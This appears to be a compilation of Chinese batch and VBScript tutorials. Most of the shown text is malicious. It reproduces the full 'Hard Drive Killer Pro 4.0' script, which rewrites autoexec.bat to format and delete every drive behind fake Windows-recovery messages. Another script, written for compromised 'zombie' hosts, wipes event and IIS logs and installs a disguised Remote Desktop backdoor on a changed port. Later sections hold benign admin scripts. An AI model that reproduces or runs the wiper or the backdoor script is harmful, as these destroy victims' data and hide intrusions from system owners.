echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c:\autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c:\autoexec.bat
echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
echo Initializing Variables . . .
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). Whats the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Dont you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga
:end
rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here).
六.精彩實例放送。
1.刪除win2k/xp系統默認共享的批處理
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file ---------------------------
2.全面加固系統(給肉雞打補丁)的批處理文件
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登陸]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件訪問和打印共享]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登陸前關機]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止顯示前一個登陸用戶名稱]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file ---------------------------
下面命令是清除肉雞全部日誌,禁止一些危險的服務,並修改肉雞的terminnal service留跳後路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [刪除日誌]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危險的服務。]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389鏈接,端口爲8210(十六進制爲00002012),名稱爲Microsoft EventLog,留條後路]
3.Hard Drive Killer Pro Version 4.0(玩批處理到這個水平真的不容易了。)
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, dont worry about how it
rem works, its d\*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then its true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if its errorlevel 1, then the specified drive is a hard or floppy drive.
rem if its not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:Sampledrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c:\autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c:\autoexec.bat
echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
echo Initializing Variables . . .
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). Whats the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Dont you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga
:end
rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here).
No.7
7、致謝&一些廢話
謹以此文獻給全部爲實現網絡的自由與共享而努力的朋友們。感謝全部共享他們做品的朋友們,讓咱們爲咱們的理想一塊兒努力!!
部份內容來自Ex4rchhttp://www.sometips.com(很好的一個...淙幌緣糜械闥繕?/a>^_^)。再次特別感謝!
如何經過批處理文件來監視你的服務器
Author: joyadam@myrealbox.com
Date: 2002-4-13 15:05:33
昨天在微軟的網站上看到了一個命令行方式下的端口掃描工具,down下來看了看,(你也能夠在http://www.sometips.com/soft/portqry.exe下載)以爲這玩藝就操做性而言比其餘同類產品差得太多,仔細一瞧,忽然它竟然有一個返回值的功能,這樣豈不是能夠在批處理文件裏面來使用,呵呵,因而乎就寫了個小小的腳本,但願能對你們有所幫助。
C:\scripts>type monitor.cmd
@echo off
setlocal
if {%1}=={} goto noparms
if {%2}=={} goto noparms
REM Please copy portqry.exe to the same folder with monitor.cmd.
portqry -n %1 -e %2 -q
IF %ERRORLEVEL% EQU 1 goto down
IF %ERRORLEVEL% EQU 0 goto up
:noparms
echo Usage: monitor.cmd ServerIP PortNumber
goto end
:up
echo The %2 port is listening on %1...
goto end
:down
echo The %2 port is not listening on %1...
goto end
:end
執行該腳本的結果:
C:\scripts>monitor.cmd
Usage: monitor.cmd ServerIP PortNumber
C:\scripts>monitor.cmd bbs.nsfocus.com 80
The 80 port is listening on bbs.nsfocus.com...
C:\scripts>monitor.cmd bbs.nsfocus.com 79
The 79 port is not listening on bbs.nsfocus.com...
注:你能夠根據你本身的須要對這個腳本進行改動,Hope it helps...
附上PortQry的用法:
PortQry Usage:
PortQry.exe -n server [-p protocol] [-e || -r || -o endpoint(s)]
[-l logfile] [-s] [-q]
Where:
-n [server] IP address or name of server to query
-p [protocol] TCP or UDP or BOTH (default is TCP)
-e [endpoint] single port to query (valid range: 1-65535)
-r [end point range] range of ports to query (start:end)
-o [end point order] range of ports to query in an order (x,y,z)
-l [logfile] name of log file to create
-s 'slow link delay' waits longer for UDP replies from remote systems
-q 'quiet' operation runs with no output
returns 0 if port is listening
returns 1 if port is not listening
returns 2 if port is listening or filtered
Notes:
This version runs on Windows 2000 and Windows XP
Defaults: TCP, port 80, no log file, slow link delay off
Hit Ctrl-c to terminate prematurely
一個Reboot的bat文件,應該能夠在Windows全部系統下適用
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:39
@echo off
echo welcome to http://www.sometips.com/
setlocal
cd/d %temp%
echo [version] > reboot.inf
set inf=InstallHinfSection DefaultInstall
echo signature=$chicago$ >> reboot.inf
echo [defaultinstall] >> reboot.inf
rundll32 setupapi,%inf% 1 %temp%\reboot.inf
del reboot.inf
監視event log的腳本
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:36
'=====================================================
'FileName: eventmon.vbs
'Usage: cscript enentmon.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date: 2001-05-13
'Comment: This Script will monitor your event log, I have tested on Win2K Server.
'=====================================================
Set Events = _
GetObject("winmgmts:{(Security)}\\.\root\cimV2").ExecNotificationQuery ("select * from __InstanceCreationEvent WHERE TargetInstance ISA " _
& "'Win32_NTLogEvent'")
Do
Set NTEvent = Events.nextevent
WScript.Echo NTEvent.TargetInstance.Message
Loop
查看主機變量的VBS,包括系統、進程、用戶等的環境變量
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:35
'=====================================================
'FileName: envar.vbs
'Usage: cscript envar.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date: 2001-04-28
'Comment: This Script will query the environments on your machine.
'=====================================================
Set shellobj = CreateObject("WScript.Shell")
WScript.Echo "System environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("SYSTEM")
WScript.Echo envvar
Next
WScript.Echo vbCrLf & "Process environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("PROCESS")
WScript.Echo envvar
Next
WScript.Echo vbCrLf & "USER environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("USER")
WScript.Echo envvar
Next
WScript.Echo vbCrLf & "VOLATILE environments variables..."
Wscript.Echo "=================================================="
For Each envvar In shellobj.Environment("VOLATILE")
WScript.Echo envvar
Next
Su2System.vbs
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:31
在平常工做中,咱們須要切換到SYSTEM用戶去作一些事情,好比說看註冊中SAM的值...
我常用的方法就是用schedule來切換,而叮叮這個破人喜歡用add service的方式切換,爲了方便,我寫了一個vbs來實現這個過程!固然,這裏沒有什麼提高權限的概念哦,由於必須管理員運行才能夠的!
'=====================================================
'FileName: su2system.vbs
'Usage: cscript su2system.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date: 2001-04-05
'Comment: This script will let you change your UID to
' NT AUTHORITY\SYSTEM, you must run it by Administrator.
'=====================================================
On Error Resume Next
Set objNet = WScript.CreateObject( "WScript.Network" )
Set ServiceObj = GetObject("WinNT://" & objNet.ComputerName & "/schedule")
if ServiceObj.Status=1 then
ServiceObj.start
end if
aHour = hour(now)
aMinute = minute(now)+"1"
set wshshell = createobject ("wscript.shell")
wshshell.run ("at " & aHour & ":" & aMinute & ":" & aSecond & " " & "/interactive cmd.exe")
Wscript.echo "Waiting for the cmd window for NT AUTHORITY\SYSTEM at " & aHour & ":" & aMinute & "..."
查詢主機Hot-Fix的腳本--Patch.vbs
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:30
'=====================================================
'FileName: patch.vbs
'Usage: cscript patch.vbs
'Author: joyadam@myrealbox.com
'HomePage: http://www.sometips.com/
'Date: 2001-03-25
' Update at 2001-03-28
'Comment: This Script will query the patch which has installed
' on your machine.
'=====================================================
winmgmt1 = "winmgmts:{impersonationLevel=impersonate}!//"& ComputerName &""
Set SPSet = GetObject( winmgmt1 ).InstancesOf ("Win32_OperatingSystem")
WScript.Echo "====================================================="
WScript.Echo "Computer Operating System Properties for " & ""& ComputerName &""
WScript.Echo "====================================================="
For each SP in SPSet
WScript.Echo "Operating System: " & SP.Name
WScript.Echo "Install Date: " & left (cstr(SP.installdate),4) & "-" & mid (cstr(SP.installdate),5,2) & "-" & mid (cstr(SP.installdate),7,2)
WScript.Echo "Build Number: " & SP.BuildNumber
WScript.Echo "Build Type: " & SP.CSDVersion
next
'Sub GetHotfixInfos() '獲取已安裝的Hot-Fixes信息
winmgmt = "winmgmts:{impersonationLevel=impersonate}!//"& ComputerName &""
Set QFESet = GetObject( winmgmt).InstancesOf ("Win32_QuickFixEngineering")
WScript.Echo "====================================================="
WScript.Echo "The following HotFixes have been Installed:"
For each QFE in QFESet
WScript.Echo QFE.HotFixID
WScript.Echo QFE.FixComments
Wscript.Echo "Please visit http://support.microsoft.com/support/kb/articles/" & left(QFE.HotFixID,4) & "/" & mid(QFE.HotFixID,5,1) & "/" & right(QFE.HotFixID,2) & ".ASP"
Wscript.Echo QFE.ServicePackInEffect
Wscript.Echo "-----------------------------------------------------"
next
'End Sub
用VBS批量修改某個OU中用戶的屬性-modify.vbs
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:29
Dim oContainer
Set oContainer=GetObject("ldap://OU/=工程部,OU=公司,DC=staff,DC=nsfocus,DC=com")
ModifyUsers oContainer
'cleanup
Set oContainer = Nothing
WScript.Echo "Finished"
Sub ModifyUsers(oObject)
Dim oUser
oObject.Filter = Array("user")
For Each oUser in oObject
oUser.Put "st","北京"
oUser.Put "streetAddress","北三環東路8號"
oUser.Put "postalCode","100028"
oUser.Put "l","北京"
oUser.SetInfo
Next
End Sub
用VBS導出AD中某一個OU中的用戶-output.vbs
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:24
'=====================================================
'output.vbs
'Author: Adam
'Date: 2001-03-07
'Comment: 使用前必須修改oContainer的值
''=====================================================
Dim OutPutFile
Dim FileSystem
'Initialize global variables
Set FileSystem = WScript.CreateObject("Scripting.FileSystemObject")
Set OutPutFile = FileSystem.CreateTextFile("users.txt", True)
Set oContainer=GetObject("ldap://OU/=公司,DC=staff,DC=nsfocus,DC=com")
'Enumerate Container
EnumerateUsers oContainer
'Clean up
OutPutFile.Close
Set FileSystem = Nothing
Set oContainer = Nothing
WScript.Echo "Finished"
WScript.Quit(0)
Sub EnumerateUsers(oCont)
Dim oUser
For Each oUser In oCont
Select Case LCase(oUser.Class)
Case "user"
If Not IsEmpty(oUser.distinguishedName) Then
OutPutFile.WriteLine "dn: " & oUser.distinguishedName
End If
If Not IsEmpty(oUser.name) Then
OutPutFile.WriteLine "name: " & oUser.Get ("name")
End If
'need to do this because oUser.name would get back the Relative Distinguished name (i.e. CN=Jo Brown)
If Not IsEmpty(oUser.st) Then
OutPutFile.WriteLine "st: " & oUser.st
End If
If Not IsEmpty(oUser.streetAddress) Then
OutPutFile.WriteLine "streetAddress: " & oUser.streetAddress
End If
Case "organizationalunit" , "container"
EnumerateUsers oUser
End Select
OutPutFile.WriteLine
Next
End Sub
Windows 下的「Which」命令
Author: joyadam@myrealbox.com
Date: 2002-1-13 18:34:21
在Linux下,有一個命令叫作which,它能夠在Path中尋找某個命令所在的目錄並顯示出來。
Linux下:
[adam@isbase adam]$ which ls
/bin/ls
[adam@isbase adam]$ which rm
/bin/rm
在NT的Resource Kit中有一個where.exe,他也有相同的功效,不過一套Resource Kit要300美圓,在這裏咱們能夠做一個批處理文件來實現這個功能。
使用記事本編輯一個which.bat,並將其存放在Winnt目錄或者其餘Path變量中的目錄裏,該批處理文件的內容以下:
@echo off
Rem 檢查命令行參數
if {%1}=={} goto :Usage
for %%i in ({ {/ {-) do if {%1}==%%i?} goto :Usage %%i
echo.
:Rem 在當前目錄檢查看是否存在該文件
for %%i in (%1) do if exist %%~nx%i (
echo %%~Fi
goto :EOF
)
:Rem 在Path中檢查該文件
for %%i in (%1) do (
if exist %%~$PATH:i (
echo %%~$PATH:i
) else (
echo Error: %1 不在路徑裏!!!
goto :Usage
)
)
goto :EOF
:Usage
echo.
echo WHICH "filename"
echo.
echo 輸入文件明,返回該文件的全路徑!
echo.
咱們來對咱們的程序做一個測試:
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權全部 1985-1998 Microsoft Corp.
C:\>which
WHICH "filename"
輸入文件明,返回該文件的全路徑!
C:\>which cmd.exe
C:\WINNT\system32\cmd.exe
C:\>
OK,測試經過!
Sendmail.vbs
Author:
Date: 2002-1-13 18:34:11
'--------------------------------------------------
'Sends email from the local SMTP service using CDONTS objects
' Usage:
' sendmail -t <to> -f <from> -s "<subject>" -b "<message>"
' sendmail [-help|-?]
'
'--------------------------------------------------
Option Explicit
On Error Resume Next
Dim objSendMail, oArgs, ArgNum
Dim strTo, strFrom, strSubject, strBody
Set oArgs = WScript.Arguments
ArgNum = 0
While ArgNum < oArgs.Count
Select Case LCase(oArgs(ArgNum))
Case "-to","-t":
ArgNum = ArgNum + 1
strTo = oArgs(ArgNum)
Case "-from","-f":
ArgNum = ArgNum + 1
strFrom = oArgs(ArgNum)
Case "-subject","-s":
ArgNum = ArgNum + 1
strSubject = oArgs(ArgNum)
Case "-body","-b":
ArgNum = ArgNum + 1
strBody = oArgs(ArgNum)
Case "-help","-?":
Call DisplayUsage
Case Else:
Call DisplayUsage
End Select
ArgNum = ArgNum + 1
Wend
If oArgs.Count=0 Or strTo="" Or strFrom="" Or _
strSubject="" Or strBody="" Then
Call DisplayUsage
Else
Set objSendMail = CreateObject("CDONTS.NewMail")
objSendMail.From = strFrom
objSendMail.To = strTo
objSendMail.Subject = strSubject
objSendMail.Body = strBody
objSendMail.Send
Set objSendMail = Nothing
End If
' Display the usage for this script
Sub DisplayUsage
WScript.Echo "Usage:"
WScript.Echo " sendmail -t <to address> -f <from address> -s " & _
Chr(34) & "<subject>" & Chr(34) & " -b " & Chr(34) & _
"<message body>" & Chr(34)
WScript.Echo " sendmail [-help|-?]"
WScript.Echo ""
WSCript.Quit
End Sub
安全啓動時所啓動的服務列表在註冊表中的位置
Author: Adam
Date: 2002-1-13 18:35:00
當系統啓動到「安全模式(Safe Mode)」和「命令行安全模式(Safe Mode with Command Prompt)」時,所啓動的服務列表能夠在下面的註冊表鍵獲得:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
當系統啓動到「有網絡的安全模式(Safe Mode with Networking)」時,所啓動的服務列表能夠在下面的註冊表鍵獲得:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
Windows 下的註冊表
Author: B.D.
Date: 2002-1-13 18:34:59
Agreement:
==========
The author of this document will not be responsible for any damage and/or
license violation that may occur. The information within this document is
provided "as is" without warranty of any kind...
This information was "collected" during sleepless nights, and is NOT
officially released by Microsoft! It shall give you a peek at the Windows(tm)
internals to give you a chance to recover from corrupted data.
The author has nothing to do with Microsoft, except that he uses their
products...
If you don't agree with this, stop reading this document, and delete it at
once!
History:
========
What is the registry? Where did it came from? Two questions, which I will try to
answer here. The registry is a database (at least microsoft thinks so:)
which contains configuration information about the system.
It mainly is a memory dump which is saved to one or more files on the windows
host drive. It is loaded every system-boot and remains resident until
shutdown. Since parts of it are not used during normal operation it will be
swapped out very soon. The registry appeared with windows 3.?? (sorry, I can't
remember any earlier version :-), where it was used for file associations and
the "OLE" functions (the conection between ole-id's and the applications).
This is a critical information and since the registry has (almost) NO
CHECKSUM information (!), it sometimes gets corrupted. This is the main
reason for this doc.
Using windows 3.x, almost every configuration was done using good old ".INI"-
